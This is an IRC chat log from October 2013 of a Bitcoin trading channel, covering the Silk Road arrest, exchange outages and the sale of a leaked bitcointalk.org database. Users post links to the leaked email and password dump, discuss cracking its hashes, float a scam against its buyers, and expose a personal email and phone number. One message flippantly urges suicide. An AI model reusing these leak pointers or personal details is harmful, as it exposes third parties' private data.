[HAVELOCK] [AM1] 16 @ 0.8983846 = 14.3742 BTC [-] {4} Oct 03 16:30:37 anyway, death of tom clancy is obv related to both btctalk being down and dpr derping himself into custody Oct 03 16:30:55 also the Tattis. Oct 03 16:30:55 [HAVELOCK] [AM100] 66 @ 0.00978546 = 0.6458 BTC [-] {9} Oct 03 16:30:59 and Armond Oct 03 16:31:04 and Nefario Oct 03 16:31:50 and, of course, 9/11 which is tied to the Holocaust. Oct 03 16:32:04 http://www.youtube.com/watch?v=2meowzEwIdw Oct 03 16:32:08 Meteors Destroy Big Ben - YouTube Oct 03 16:32:34 it is all connected >D Oct 03 16:32:50 lol Oct 03 16:32:54 favorite comment, "fake" Oct 03 16:33:16 Meteorite deniers are the worst. Oct 03 16:33:22 that's "the special message from satoshi" to the btctalk users :S Oct 03 16:37:03 lel Oct 03 16:37:05 obv fake! Oct 03 16:37:53 considering opening a site called the Milk Road Oct 03 16:38:03 where vendors sell molokosynthemesc Oct 03 16:38:09 and related substances Oct 03 16:45:09 [HAVELOCK] [AM100] 80 @ 0.00959075 = 0.7673 BTC [-] {4} Oct 03 16:49:53 Tom Clancy new book was on SR Oct 03 17:04:01 I can't believe DPR was operation out of the US Oct 03 17:04:02 so dumb Oct 03 17:08:32 [HAVELOCK] [SMG] 757 @ 0.00019786 = 0.1498 BTC [+] {2} Oct 03 17:10:46 lol im just reading about it too. Oct 03 17:10:53 ]he sure talked a big game Oct 03 17:10:57 bitcoiners, meh Oct 03 17:11:58 heh Oct 03 17:12:16 heavy lels when i read that his $80k "clean hit" was staged by the feds Oct 03 17:12:23 what a fucking dummy Oct 03 17:12:36 [MPEX] [S.MPOE] 4719 @ 0.00092691 = 4.3741 BTC [-] {2} Oct 03 17:13:04 lol ya Oct 03 17:13:11 and so hubris and vainglory became his undoing Oct 03 17:13:15 real libertarian hero Oct 03 17:13:28 ordering beatings and assassinations Oct 03 17:13:30 and on top of the murder for hire, this dumbass then buys a few dozen fake ids from the guy doing the hit, and bam, they can now match his known picture with the one used for the IDs Oct 03 17:13:47 yeah Oct 03 17:13:51 getting shit mailed to his house Oct 03 17:13:54 and in the end, he was just some holier than thou hipster Oct 03 17:13:55 like... Oct 03 17:14:02 its amusing Oct 03 17:14:07 half the people buying on SR took more precautions than he did Oct 03 17:14:33 i think it's funny because the criminal is being criticized by criminals Oct 03 17:14:47 everybody is a criminal Oct 03 17:14:54 you, me, everyone Oct 03 17:15:05 i'm not disagreeing Oct 03 17:15:20 well, who else would he be criticized by? there's nobody left Oct 03 17:15:48 what is crime? Oct 03 17:16:13 what is reality? Oct 03 17:16:15 wow, he ssh'd directly into the site to admin it from a internet cafe Oct 03 17:16:16 lmao Oct 03 17:16:39 let's see $16/btc again please Oct 03 17:16:48 these labcoin explanation threads on reddit are also funny Oct 03 17:16:48 wishful thinking Oct 03 17:16:53 >Well at least BitBet did better than BTCtalk and Silk Road this month. I blame the Somalian. Oct 03 17:16:58 im fucked till i die. Oct 03 17:17:00 the price of BTC dipped for what, a couple hours? Oct 03 17:18:03 the whales can only hold the market up for so long Oct 03 17:18:09 UH. Oct 03 17:18:13 havelock: Oct 03 17:18:15 There are insufficient funds in the Hot Wallet to process your withdraw. The site operators have been notified of your request and will move Bitcoins from Cold Storage. Please try your withdraw again after 1 full business day. Oct 03 17:18:27 everyone cashing out Oct 03 17:18:42 fffffff.... Oct 03 17:18:57 never trust another human with your money Oct 03 17:27:27 "I have gone through the mental exercise of spending a lifetime in prison and of dying for this cause. I have let the fear pass through me and with clarity commit myself fully to the mission and values outlined in the Silk Road charter." Oct 03 17:27:28 lel Oct 03 17:28:25 don't worry guys, he THOUGHT about spending 60 years in jail and decided it's no biggie Oct 03 17:29:25 where is that from nubbins` Oct 03 17:29:57 http://www.activistpost.com/2013/09/virtual-black-market-atlantis-walks.html Oct 03 17:29:57 Activist Post: Virtual black market Atlantis walks the plank, Dread Pirate Roberts humbled Oct 03 17:30:21 that was from like 2 weeks ago Oct 03 17:30:30 ah Oct 03 17:30:35 k Oct 03 17:30:54 would be interesting to see if he still holds those beliefs Oct 03 17:31:37 strange seeing havelock out number btct in trades Oct 03 17:32:30 strange seeing them run out of BTC to cover withdrawals too Oct 03 17:33:42 btct is shutting down, no? Oct 03 17:33:50 yes Oct 03 17:33:52 oct 7? Oct 03 17:34:20 lots of bad stuff happening to btc Oct 03 17:34:27 man. i called my bank today to see about opening a safety deposit box Oct 03 17:34:29 they said Oct 03 17:34:32 and i'm not shitting you Oct 03 17:34:40 that they couldn't open the box that has all their keys in it Oct 03 17:34:50 and so i'd have to wait until monday Oct 03 17:34:53 lol Oct 03 17:35:15 "so safe that not even YOU can access it" Oct 03 17:35:29 't Oct 03 17:36:34 ;;seen chaangnoi Oct 03 17:36:34 chaangnoi was last seen in #bitcoin-assets 5 days, 15 hours, 42 minutes, and 10 seconds ago: sorry for double post i fail at irc Oct 03 17:36:43 ;;seen chaang-noi Oct 03 17:36:43 chaang-noi was last seen in #bitcoin-assets 2 weeks, 5 days, 22 hours, 14 minutes, and 43 seconds ago: TOM FORD Oct 03 17:44:07 http://techliberation.com/wp-content/uploads/2013/10/SilkRoadProtectiveOrder.pdf Oct 03 17:46:29 lol Oct 03 17:46:42 SR, now Bitcointalk.org Oct 03 17:49:22 gov is going through everyones messages and pm's n that Oct 03 17:49:31 should we be worried? Oct 03 17:49:56 or are they just looking for people who used sr? Oct 03 17:50:39 ? Oct 03 17:50:48 what makes you say that Oct 03 17:58:22 [HAVELOCK] [B] [XBOND] 1587 @ 0.00127999 = 2.0313 BTC [+] {2} Oct 03 17:59:23 [HAVELOCK] [AM1] 22 @ 0.85 = 18.7 BTC [-] Oct 03 18:00:14 messages were supposedly deleted after 30 days Oct 03 18:00:34 so if you didn't use cleartext for the couple months before they got it, you should be ok. Oct 03 18:11:45 3.6 million in bit coins that was held in escrow Oct 03 18:11:56 so the us gov just got 1/7th of all bitcoins? Oct 03 18:12:52 Bitcointalk.org will be back Oct 03 18:13:27 yep, got eta tho? Oct 03 18:14:45 taub, they have 3.6 million USD worth of bitcoin Oct 03 18:16:28 btct.co isn't available either, lol Oct 03 18:16:46 I can use btct Oct 03 18:17:16 I get "Error: Oct 03 18:17:16 Xcoind backend failure at 135 Oct 03 18:17:27 whenever I try and open any page Oct 03 18:19:23 aight zoinky Oct 03 18:19:33 that makes more sense Oct 03 18:21:43 Well I can go through the site but can't make any trades Oct 03 18:21:47 I was just using btct, works for me Oct 03 18:21:48 If that makes you feel any better :) Oct 03 18:23:43 nevermind, I see the failure message when i try to buy Oct 03 18:28:28 Is labcoin still a scam? Oct 03 18:31:15 Could be, we're working on getting more information out Sam/Labcoin and trying to get things moving onto BF Oct 03 18:31:29 If anything more so a failed project Oct 03 18:31:29 this might sound like a silly queston, but on Havelock, where do you go to change your password? Oct 03 18:37:32 I was reading on the silk road forums today, interesting stuff. Someone else got arrested in the UK. Someone who sells packaging supplies to silk roaders....It could be argued that selling packaging containers is not illegal but they arrested him and stole his computer anyway. Oct 03 18:37:51 he also sold seeds Oct 03 18:37:58 but thats not illegal either is it? Oct 03 18:38:13 I don't think so, not in the UK anyway Oct 03 18:39:58 http://www.reddit.com/r/SilkRoad/comments/1nmfam/possible_first_raid_on_a_vendor/ Oct 03 18:39:58 Possible first raid on a vendor : SilkRoad Oct 03 18:41:17 yes, that's the same one from the forum Oct 03 18:41:45 They're looking for his customer list by the looks of it. He's out on bail already according to the forum Oct 03 18:42:27 nuts im sure more arrests will happen Oct 03 18:46:09 [MPEX] [S.MPOE] 3200 @ 0.00093002 = 2.9761 BTC [+] Oct 03 18:49:12 [HAVELOCK] [AM1] 3 @ 0.87 = 2.61 BTC [+] Oct 03 18:50:13 [HAVELOCK] [NEOBEE] 102 @ 0.00290101 = 0.2959 BTC [-] Oct 03 18:51:14 [HAVELOCK] [AM100] 87 @ 0.00944782 = 0.822 BTC [-] {7} Oct 03 18:51:47 yeeeeeeh my nicca posted bail Oct 03 18:51:51 give em hell pirate Oct 03 18:52:04 ? Oct 03 18:52:15 [HAVELOCK] [AM1] 1 @ 0.95 BTC [+] Oct 03 18:53:16 [HAVELOCK] [NEOBEE] 112 @ 0.00290002 = 0.3248 BTC [-] {2} Oct 03 18:54:17 [HAVELOCK] [NEOBEE] 1139 @ 0.0029 = 3.3031 BTC [-] {3} Oct 03 18:55:39 I don't see my name in the btctalk dump: http://pastebin.com/4Hf37D9H Oct 03 18:57:32 only 5k there Oct 03 18:57:41 I forget the spam email I used on bitcointalk :D Oct 03 18:57:46 I don't know if I'm on there :p Oct 03 18:58:33 where'd that get leaked from Oct 03 18:59:48 I'm not on there Oct 03 19:00:23 [HAVELOCK] [AM1] 1 @ 0.9 BTC [-] Oct 03 19:00:56 only 5k users there Oct 03 19:01:01 cant you read Oct 03 19:01:18 No Oct 03 19:06:29 [MPEX] [S.MPOE] 2850 @ 0.0009303 = 2.6514 BTC [+] Oct 03 19:08:31 [HAVELOCK] [HIM] 2 @ 0.14299996 = 0.286 BTC [+] Oct 03 19:11:12 so what's keeping btc up? what are people spending their btc on now? Oct 03 19:11:38 i have to be honest, i always thought that if the silk road place went down, bitcoin would go with it, as i simply dont see enough commerce available. Oct 03 19:12:35 [MPEX] [S.MPOE] 1750 @ 0.00093002 = 1.6275 BTC [-] Oct 03 19:13:21 Rawted http://trilema.com/2013/i-was-right-you-were-wrong-again-feel-the-burn/ Oct 03 19:16:44 jcpham@tiscali.it Oct 03 19:16:48 SO MUCH ROFFL Oct 03 19:17:50 heh Oct 03 19:17:54 .it => scammer Oct 03 19:18:06 it's not even me Oct 03 19:18:48 frankly i see a lot of important names though Oct 03 19:19:12 fo sho Oct 03 19:19:22 i say targeted list Oct 03 19:23:07 Rawted, i imagine the silkroad community is hooked and just looking for alternatives. Oct 03 19:23:47 [HAVELOCK] [B] [XBOND] 1405 @ 0.00127999 = 1.7984 BTC [-] {2} Oct 03 19:24:48 [HAVELOCK] [B] [XBOND] 250 @ 0.00128 = 0.32 BTC [+] Oct 03 19:24:54 http://www.wired.com/threatlevel/2013/10/lavabit_unsealed/ Oct 03 19:24:54 Edward Snowden's E-Mail Provider Defied FBI Demands to Turn Over Crypto Keys, Documents Show | Threa Oct 03 19:25:12 hi Oct 03 19:27:30 Levison is the man Oct 03 19:30:30 also FBI doesnt know how to use a scanner Oct 03 19:31:09 i mean shit, its same way i store my privates Oct 03 19:34:58 [MPEX] [S.MPOE] 1950 @ 0.00092926 = 1.8121 BTC [-] {2} Oct 03 19:35:59 [MPEX] [S.MPOE] 1050 @ 0.00093095 = 0.9775 BTC [+] Oct 03 19:35:59 [HAVELOCK] [B] [XBOND] 100 @ 0.00127 = 0.127 BTC [-] Oct 03 19:50:13 [MPEX] [S.MPOE] 2350 @ 0.00093095 = 2.1877 BTC [+] Oct 03 19:51:05 i store my privates in a jar on my wife's nightstand Oct 03 19:53:48 I store my privates in my wife Oct 03 19:53:53 From time to time Oct 03 19:54:35 me too. Oct 03 19:54:40 Thank you for that. Oct 03 19:54:54 Yeah thought I'd share Oct 03 19:55:02 Sharing is caring. Oct 03 19:55:27 Oh shit over my head... You bastard! Oct 03 19:56:12 i keep my privates encrypted and printed on paper on location A and B, and the key to unlock those in location C and D Oct 03 19:56:22 oh, shit, we're talking about keys! Oct 03 19:56:30 lel, so embarassed, &c Oct 03 20:05:29 [HAVELOCK] [AM100] 50 @ 0.00999899 = 0.4999 BTC [+] {2} Oct 03 20:06:35 http://pastebin.com/6S2H21eF Oct 03 20:06:39 bitcointalk.org db dump (150k records) - Pastebin.com Oct 03 20:07:31 yikes Oct 03 20:07:38 prolly faek Oct 03 20:08:09 Hmm.. I'm disappointed that they guy didn't even send 2-3 BTC transactions to that address to at least make it appear as if people are taking the offer Oct 03 20:08:19 The BTC address has not seen any transactions. Oct 03 20:08:50 e-mails and hashed passwords? pretty much useless Oct 03 20:09:02 yep Oct 03 20:09:07 why the fuck would anyone buy that? Oct 03 20:09:30 spammers buy e-mail lists Oct 03 20:09:39 http://pastebin.com/qTuekr3b Oct 03 20:09:40 bitcointalk.org db dump with over 150K emails and hashed passwords; get a pri - Pastebin.com Oct 03 20:09:50 but for 25 BTC? Oct 03 20:10:13 probably not Oct 03 20:10:13 that's almost 2 cents per email! Oct 03 20:10:20 highway robbery Oct 03 20:10:25 and the mtgox mails are already a good db for bticoin spams Oct 03 20:10:48 at that time their db was small Oct 03 20:13:10 but can't i just watch that address and mitm the list now Oct 03 20:13:21 when someone pays him, email him and say it was me Oct 03 20:13:38 i bet he challenges it wanting something signed too Oct 03 20:13:42 no doubt Oct 03 20:14:38 [HAVELOCK] [HIM] 2 @ 0.14299996 = 0.286 BTC [+] Oct 03 20:18:54 anyone heard from burnside? no trading on btct.co for 7 hours. Oct 03 20:18:57 https://blockchain.info/address/1t4k5Y4NFFkvEAqBPymW2PDA5pZqiRm11 Oct 03 20:19:00 Bitcoin Address 1t4k5Y4NFFkvEAqBPymW2PDA5pZqiRm11 Oct 03 20:19:32 seems legit, i will send all my coins there Oct 03 20:19:35 1 sec Oct 03 20:22:15 plunge when it comes back i bet Oct 03 20:24:27 Yeah not looking forward to that Oct 03 20:24:39 Does anyone remember btct's address? btc addy Oct 03 20:24:44 *if it comes back Oct 03 20:24:47 [HAVELOCK] [CBTC] 11000 @ 0.00027999 = 3.0799 BTC [-] {3} Oct 03 20:27:07 i guess we are all going to have to move over to Yahoo message board Oct 03 20:27:33 For the amount of trolls on btctalk, wouldn't 4chan be better? Oct 03 20:28:37 .d Oct 03 20:28:37 148819199.80509 | Next Diff in 562 blocks | Estimated Change: 24.1651% in 2d 22h 44m 56s Oct 03 20:29:51 gold coins vs gold wafers, any thoughts? Oct 03 20:30:11 gold waffles? Oct 03 20:30:34 the fuck Oct 03 20:30:46 someone in #bitcoin suggested gold pancakes Oct 03 20:30:58 you guise! :( Oct 03 20:32:23 The Flap Jack Miner 2000 Oct 03 20:33:27 you know this shows I am old or something. I have never been to 4chan Oct 03 20:33:53 4chan is pretty old, but don't worry it's a silly place Oct 03 20:34:12 It's mainly Troll HQ Oct 03 20:34:36 I am not much into reading troll, I can't even stand -otc Oct 03 20:35:42 -otc is generally teenagers trying to buy and sell btc through the most arcane, convoluted means possible Oct 03 20:35:49 at least, that's what i gather Oct 03 20:36:06 It can be amusing to read sometimes, they will hijack (not hack) several voting events like I believe the Hijacked Justin Bieber's voting page once on his site with "Where should Justin go next?" And had all the members vote for North Korea Oct 03 20:36:16 yeah or they are mentally challenged, one of the two Oct 03 20:37:00 hahaha i love when they do that. theres a lot of followers, can be a powerful force Oct 03 20:37:01 whats the deal with ADDICTION? they getting some miners soon? Oct 03 20:37:25 I did very much enjoy the mac webkit error that kicked you off IRC Oct 03 20:37:54 webkit ftw Oct 03 20:38:11 it's my favourite rendering engine! Oct 03 20:41:03 [MPEX] [S.MPOE] 1300 @ 0.00093135 = 1.2108 BTC [+] Oct 03 20:47:10 [HAVELOCK] [CBTC] 1770 @ 0.00022701 = 0.4018 BTC [-] Oct 03 20:48:11 [HAVELOCK] [CBTC] 6778 @ 0.00022701 = 1.5387 BTC [-] {3} Oct 03 21:24:47 [HAVELOCK] [CBTC] 5407 @ 0.00022701 = 1.2274 BTC [-] Oct 03 21:25:48 [HAVELOCK] [CBTC] 500 @ 0.00027999 = 0.14 BTC [+] Oct 03 21:29:52 [HAVELOCK] [AM100] 348 @ 0.00934878 = 3.2534 BTC [-] {21} Oct 03 21:30:53 [MPEX] [S.MPOE] 2300 @ 0.00093135 = 2.1421 BTC [+] Oct 03 21:39:19 MtGox BTCUSD ticker | Best bid: 130.01000, Best ask: 130.10398, Bid-ask spread: 0.09398, Last trade: 130.00000, 24 hour volume: 65013.66466618, 24 hour low: 118.23000, 24 hour high: 132.00000, 24 hour vwap: 126.12904 Oct 03 21:42:05 .d Oct 03 21:42:10 148819199.80509 | Next Diff in 556 blocks | Estimated Change: 23.8005% in 2d 22h 29m 6s Oct 03 21:43:07 [HAVELOCK] [AM100] 20 @ 0.00812253 = 0.1625 BTC [-] {2} Oct 03 21:44:08 [HAVELOCK] [B] [XBOND] 525 @ 0.00123857 = 0.6502 BTC [-] {6} Oct 03 21:46:54 is btct working yet? Oct 03 21:48:17 nope, still has error message Oct 03 21:49:30 ? Oct 03 21:49:33 im on btct Oct 03 21:50:09 try to buy/sell ... won't work Oct 03 21:50:13 [HAVELOCK] [AM100] 33 @ 0.00801308 = 0.2644 BTC [-] {2} Oct 03 21:50:31 ah Oct 03 21:51:14 [HAVELOCK] [AM100] 28 @ 0.00800003 = 0.224 BTC [-] Oct 03 21:51:32 anybody know how to contact burnsides to get btct back up again? Oct 03 21:51:48 call 080-NEFARIOUS Oct 03 21:51:59 wasn't that in the announcement? Oct 03 21:52:05 that on a certain date, trading would stop? Oct 03 21:52:22 did you see the news that the helpline for ObamaCare is 1-800-F1U-CKYO ? Oct 03 21:53:18 imsaguy - I thought trading went until the 7th? Oct 03 21:53:27 I don't know the date. Oct 03 21:53:30 I don't use the exchange. Oct 03 21:53:40 I'm just going based on what I can remember from what I read. Oct 03 21:54:00 "October 7, 2013, all forms of secondary market trading will be halted on both sites" from the website Oct 03 21:55:18 [MPEX] [S.MPOE] 4300 @ 0.00093352 = 4.0141 BTC [+] {4} Oct 03 21:55:58 what's the number in the curly braces at the end of the ticker mean? Oct 03 21:56:43 the number of trades that were condensed into the single report Oct 03 21:57:08 so the last report means that 4 trades were executed, totalling 4300 shares, average price of 0.00093352 Oct 03 21:57:08 http://news.softpedia.com/news/Hacker-Claims-He-s-Selling-Data-Stolen-from-Bitcointalk-org-for-25BTC-Exclusive-388252.shtml Oct 03 21:59:11 damn hackers Oct 03 21:59:32 is he selling deleted posts, too? would buy for lulz Oct 03 22:01:45 Are the passwords each hashed individually, or once he breaks the encryption for one he can read all of them? Oct 03 22:02:17 http://pastebin.com/4Hf37D9H the sample Oct 03 22:02:18 bitcoin***.org - Pastebin.com Oct 03 22:02:24 plambert no Oct 03 22:02:48 no what? Oct 03 22:02:48 that's question for theymos... if he used standard salted hashes then only easy passwords can be cracked Oct 03 22:03:35 "Passwords are hashed using sha256crypt with 7500 rounds (very strong)" Oct 03 22:07:29 [MPEX] [S.MPOE] 4997 @ 0.00093611 = 4.6777 BTC [+] {2} Oct 03 22:11:08 eeeh? gonna increase my fat-finger-catch asks Oct 03 22:11:19 on s.mpoe Oct 03 22:15:56 jurov: what are fat-finger-catch asks? for accidental buys? Oct 03 22:17:07 yes, if one places buy for s.mpoe at market place.. or puts decimal dot in wrong place Oct 03 22:17:30 happened serveral times on mpex already Oct 03 22:18:06 jurov: yeah, but noticed it mostly downwards Oct 03 22:18:13 only 45k shares for sale atm Oct 03 22:18:35 very thin, noone wants to sell Oct 03 22:21:49 interested to see what becaomes of the 600,000 bitcoins Oct 03 22:23:53 what if someone does that on coinbr Oct 03 22:24:10 you gonna take the gap? Oct 03 22:25:54 ;;me Oct 03 22:25:55 Error: "me" is not a valid command. Oct 03 22:26:44 kakobrekla: what exactly? putting in unfavorable price? Oct 03 22:27:43 well Oct 03 22:27:44 it will still get dutifully placed on mpex and mpex will duly fill it and report cross-trade (an undocumented feature) Oct 03 22:27:46 say somebody says "sell at 0.0000001" and they actually sell at 0.001, do you credit them the 0.001 or the 0.0000001? Oct 03 22:28:31 no, i credit them real sell price Oct 03 22:29:19 https://blockchain.info/address/1t4k5Y4NFFkvEAqBPymW2PDA5pZqiRm11 look at the notes... haha ;) Oct 03 22:29:22 Bitcoin Address 1t4k5Y4NFFkvEAqBPymW2PDA5pZqiRm11 Oct 03 22:32:00 amazing Oct 03 22:32:00 AMAZING COMPANY! Oct 03 22:32:03 dammit Oct 03 22:32:45 midge doesnt give a fuck. Oct 03 22:32:55 [HAVELOCK] [AM1] 3 @ 0.9 = 2.7 BTC [-] Oct 03 22:43:11 ;;bc,convert eur Oct 03 22:43:11 1 BTC = 130.12900 U.S. dollars = 96.2350244 Euros Oct 03 22:43:43 ;;seen davout Oct 03 22:43:43 davout was last seen in #bitcoin-assets 3 days, 7 hours, 37 minutes, and 57 seconds ago: mircea_popescu: there's still work to get everything smoothly running Oct 03 22:44:04 indeed...waiting almos a week for verfication Oct 03 22:45:04 hm Oct 03 22:45:11 yeah i might register as well there Oct 03 22:45:30 since i ditched the two cans and a string exchange Oct 03 22:47:11 you weren't there before? my old account still works, just needs reverification Oct 03 22:47:18 i wasnt Oct 03 22:50:26 looks like the price has pretty much bounced back from yesterday's "crash!!1! omg the sky is falling this is the end of bitcoins" Oct 03 22:51:01 crackheads ran out of btc to sell Oct 03 22:51:32 plambert: i guess hedge fund managers used any panic sells to slightly improve their btc position Oct 03 22:51:45 Who here got the cheapest bitcoins? I got some for about 105 Oct 03 22:51:48 yea Oct 03 22:52:14 [MPEX] [S.MPOE] 700 @ 0.00093429 = 0.654 BTC [-] Oct 03 23:10:19 what's up with btc-tc? no trades in 10 hours Oct 03 23:15:38 [HAVELOCK] [VTX] 2 @ 0.42 = 0.84 BTC [-] Oct 03 23:25:48 [HAVELOCK] [AM100] 20 @ 0.0085 = 0.17 BTC [+] Oct 03 23:43:05 [HAVELOCK] [AM100] 30 @ 0.0084956 = 0.2549 BTC [-] {3} Oct 03 23:50:55 .d Oct 03 23:50:55 148819199.80509 | Next Diff in 539 blocks | Estimated Change: 23.9647% in 2d 20h 3m 30s Oct 03 23:51:12 [MPEX] [S.MPOE] 2815 @ 0.00093429 = 2.63 BTC [-] Oct 03 23:52:13 [MPEX] [S.MPOE] 4235 @ 0.0009366 = 3.9665 BTC [+] {2} Oct 03 23:59:21 [MPEX] [S.MPOE] 2450 @ 0.00093073 = 2.2803 BTC [-] {2} Oct 04 00:11:33 [HAVELOCK] [DEALCO] 41 @ 0.00749975 = 0.3075 BTC [+] {2} Oct 04 00:11:34 [MPEX] [S.MPOE] 3511 @ 0.0009376 = 3.2919 BTC [+] {2} Oct 04 00:15:37 [BTCTC] [BASIC-MINING] 50 @ 0.04184159 = 2.0921 BTC [-] {8} Oct 04 00:18:39 oooo Oct 04 00:20:32 ;;bc,stats Oct 04 00:20:35 Current Blocks: 261543 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 536 blocks | Next Difficulty In About: 2 days, 16 hours, 19 minutes, and 11 seconds | Next Difficulty Estimate: 184354428.172 | Estimated Percent Change: 23.87812 Oct 04 00:21:03 ;;calc 184*1.3 Oct 04 00:21:04 239.2 Oct 04 00:28:50 [MPEX] [S.MPOE] 1296 @ 0.00094023 = 1.2185 BTC [+] Oct 04 00:29:32 !t h dealco Oct 04 00:29:34 [HAVELOCK:DEALCO] 1D: 0.00749000 / 0.00749976 / 0.00750000 (41 shares, 0.30749000 BTC), 7D: 0.00420003 / 0.00514473 / 0.00969995 (573 shares, 2.94793246 BTC), 30D: 0.00300000 / 0.00938613 / 0.01525000 (10830 shares, 101.65180960 BTC) Oct 04 00:30:44 Samuel Cole +46.732300149 Phone Oct 04 00:30:50 :P Oct 04 00:31:01 err… wrong screen :) Oct 04 00:33:21 I see Oct 04 00:38:46 Trading is back on btct Oct 04 00:38:56 Go burnside Oct 04 00:45:06 [MPEX] [S.MPOE] 243 @ 0.00094023 = 0.2285 BTC [+] Oct 04 00:49:11 [HAVELOCK] [CBTC] 43275 @ 0.0001956 = 8.4646 BTC [-] {22} Oct 04 01:05:04 plambert> Are the passwords each hashed individually, or once he breaks the encryption for one he can read all of them? << they theoretically should use varied salts, but was no mention of that so prolly not. Oct 04 01:05:14 even so, having the salt helps but doesn Oct 04 01:05:17 't make it trivial. Oct 04 01:08:30 [BTCTC] [ASICMINER-PT] 9 @ 0.997 = 8.973 BTC [+] Oct 04 01:09:31 [BTCTC] [FN] [DMS.PURCHASE] 25 @ 0.00626996 = 0.1567 BTC [-] {2} Oct 04 01:10:32 [BTCTC] [ASICMINER-PT] 17 @ 0.999 = 16.983 BTC [+] {2} Oct 04 01:28:50 [BTCTC] [ASICMINER-PT] 6 @ 0.999 = 5.994 BTC [+] Oct 04 01:30:58 In an interesting work-around, Levison complied the next day by turning over the private SSL keys as an 11 page printout in 4-point type. The government, not unreasonably, called the printout “illegible.” Oct 04 01:31:05 ahahaha asciilifeform Oct 04 01:31:13 this guy is some sort of contemporary hero already. Oct 04 01:31:24 we need a levison day. Oct 04 01:31:32 i guess june 28. Oct 04 01:32:17 hope he's got the good sense to skip the country (or fellate his pistol) before they bring him in for the crime of closing his shop. Oct 04 01:42:35 if they were any good, they probably could have brute-scanned the paper Oct 04 01:42:46 you can actually recover blurred text easily Oct 04 01:44:30 this is rather like that fellow who paid his tax bill with a wheelbarrow of pennies: not a real obstacle. Oct 04 01:47:08 [BTCTC] [ASICMINER-PT] 1 @ 1.026 BTC [+] Oct 04 01:47:50 nah. it's the principle of the matter. Oct 04 01:48:15 the people dumping tea in the harbor did not measurably impact the british either. Oct 04 01:48:30 yeah, but they hate disobedience Oct 04 01:48:56 i dare say his pulling the plug was more significant re: disobedience Oct 04 01:49:13 yes; it was the second step Oct 04 01:52:05 more effective, yes. more significant, no. Oct 04 01:56:17 [HAVELOCK] [VTX] 48 @ 0.42 = 20.16 BTC [-] Oct 04 01:57:19 [HAVELOCK] [VTX] 8 @ 0.4001 = 3.2008 BTC [-] Oct 04 01:58:59 <[\\\]> What was teh asicminer div yesterday? Oct 04 01:59:20 [BTCTC] [PETA-MINE] 4 @ 0.65 = 2.6 BTC [+] Oct 04 02:00:17 0.08 Oct 04 02:00:23 http://log.bitcoin-assets.com/?date=02-10-2013#338446 Oct 04 02:00:23 <[\\\]> wow Oct 04 02:00:24 .00800337 Oct 04 02:00:25 #bitcoin-assets log Oct 04 02:00:29 +0 Oct 04 02:02:23 [BTCTC] [BMF] 40 @ 0.015 = 0.6 BTC [+] Oct 04 02:03:24 [MPEX] [S.MPOE] 5600 @ 0.0009302 = 5.2091 BTC [-] {4} Oct 04 02:03:41 http://trilema.com/2013/why-june-28th-is-levison-day/ Oct 04 02:03:42 Why June 28th is Levison day pe Trilema - Un blog de Mircea Popescu. Oct 04 02:05:26 [BTCTC] [FN] [DMS.SELLING] 40 @ 0.00511 = 0.2044 BTC [-] Oct 04 02:07:21 http://it.slashdot.org/story/13/10/03/221248/adobe-hacked-almost-3-million-accounts-compromised everyone hacked Oct 04 02:07:22 Adobe Hacked: Almost 3 Million Accounts Compromised - Slashdot Oct 04 02:07:28 [BTCTC] [DMS.MINING] 173 @ 0.001188 = 0.2055 BTC [-] Oct 04 02:08:29 [BTCTC] [CIPHERMINE-PT] 12 @ 0.014 = 0.168 BTC [-] Oct 04 02:08:52 adobe. good riddance. Oct 04 02:08:55 http://www.wired.com/business/2013/10/twitter-files-for-ipo-2/ "we're losing millions, let's IPO" Oct 04 02:08:55 Twitter Files for IPO, Shows $317M in Revenue | Wired Business | Wired.com Oct 04 02:09:30 [BTCTC] [RSM] 89 @ 0.00320112 = 0.2849 BTC [+] {2} Oct 04 02:09:47 worked for fb... Oct 04 02:10:06 I don't think fb was actually losing money Oct 04 02:10:31 [BTCTC] [LABCOIN] 20000 @ 0.0002 = 4 BTC [-] Oct 04 02:12:06 you kidding right ? Oct 04 02:21:43 [BTCTC] [LABCOIN] 1300 @ 0.0002 = 0.26 BTC [-] Oct 04 02:26:48 [BTCTC] [ASICMINER-PT] 5 @ 0.9802 = 4.901 BTC [-] Oct 04 02:27:49 [BTCTC] [ASICMINER-PT] 9 @ 0.9802 = 8.8218 BTC [-] {2} Oct 04 02:28:50 [BTCTC] [ASICMINER-PT] 10 @ 0.98 = 9.8 BTC [-] Oct 04 02:30:36 asciilifeform kinda funny how the original order was issued by the buchanan magistrate at 4pm, and before closing time (so within an hour ?) she was issuing forthwiths with handwritten admonitions. Oct 04 02:30:52 [BTCTC] [ASICMINER-PT] 1 @ 0.9665 BTC [-] Oct 04 02:30:58 basically they have this set of lackeys in the magistrature that do nothing all day except waiting for the phone to ring or what is it ? Oct 04 02:31:38 it brings to mind the case of the texas magistrate who had resolved motions the day they were filed and ruled within ten days or something, Oct 04 02:32:02 and then ditched any requests to explain whether he had modified his vacation in order to help out teh government. Oct 04 02:33:55 [BTCTC] [ASICMINER-PT] 18 @ 0.9631 = 17.3358 BTC [-] Oct 04 02:34:56 [MPEX] [S.MPOE] 1700 @ 0.00092803 = 1.5777 BTC [-] Oct 04 02:35:57 [BTCTC] [LABCOIN] 22565 @ 0.00021659 = 4.8874 BTC [+] {12} Oct 04 02:36:58 [BTCTC] [LABCOIN] 470 @ 0.0002186 = 0.1027 BTC [+] {2} Oct 04 02:40:01 [BTCTC] [ASICMINER-PT] 2 @ 0.963 = 1.926 BTC [-] Oct 04 02:45:06 [BTCTC] [ASICMINER-PT] 1 @ 0.9625 BTC [-] Oct 04 02:46:07 [BTCTC] [ASICMINER-PT] 20 @ 0.96121999 = 19.2244 BTC [-] {5} Oct 04 02:47:08 [BTCTC] [ASICMINER-PT] 6 @ 0.9611 = 5.7666 BTC [-] Oct 04 02:47:08 [HAVELOCK] [AM1] 14 @ 0.87817049 = 12.2944 BTC [-] {5} Oct 04 02:52:13 [MPEX] [S.MPOE] 3800 @ 0.00092659 = 3.521 BTC [-] {3} Oct 04 02:57:18 [BTCTC] [BTC-TRADING-PT] 10 @ 0.035 = 0.35 BTC [-] Oct 04 02:58:19 [HAVELOCK] [B] [XBOND] 1110 @ 0.00120085 = 1.3329 BTC [-] {5} Oct 04 02:59:21 [HAVELOCK] [VTX] 24 @ 0.39167083 = 9.4001 BTC [-] {3} Oct 04 03:10:31 [HAVELOCK] [CBTC] 2500 @ 0.00025196 = 0.6299 BTC [+] {4} Oct 04 03:11:32 [HAVELOCK] [AM100] 465 @ 0.00849991 = 3.9525 